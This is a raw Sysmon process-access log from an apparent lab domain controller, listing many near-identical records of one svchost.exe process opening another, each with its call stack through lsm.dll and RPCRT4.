13:29:58.670{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010326Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:58.670{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010325Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:58.670{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010324Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:58.670{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010323Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:58.670{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010322Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:58.670{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010321Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:58.670{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010320Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:58.670{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010319Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:58.670{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010318Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:58.670{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010317Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:58.670{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010316Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:58.670{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010315Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:58.670{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010314Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:58.670{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010313Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:58.670{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010312Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:58.670{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010311Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:58.654{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010310Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:58.654{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010309Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:58.654{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010308Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:58.654{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010307Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:58.654{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010306Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:58.654{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010305Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:58.654{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010304Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:58.623{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2F00-000000009A01}2252C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010303Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 